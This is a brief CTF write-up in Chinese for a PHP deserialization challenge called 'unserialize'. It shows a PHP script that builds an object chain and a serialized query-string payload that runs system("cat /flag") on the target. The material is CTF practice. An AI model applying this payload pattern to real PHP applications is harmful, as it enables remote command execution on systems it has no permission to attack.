unserialize

lq61618 2024-06-26 20:12:01 578 0


1.构造脚本

<?php

class entrance
{
public $start;

}

class springboard
{
public $middle;
}

class evil
{
public $end = 'system("cat /flag");';
}

$evil = new evil;
$springboard = new springboard;
$springboard->middle = $evil;
$entrance = new entrance;
$entrance->start = $springboard;
echo serialize($entrance);
?>

2.pyload

?serialize=O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system("cat /flag");";}}

分类:WEB
image
作者:lq61618

1

提交

0

收入

相关WriteUP

  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • Fetus Web

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 8月前
  • post-the-get

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
问题反馈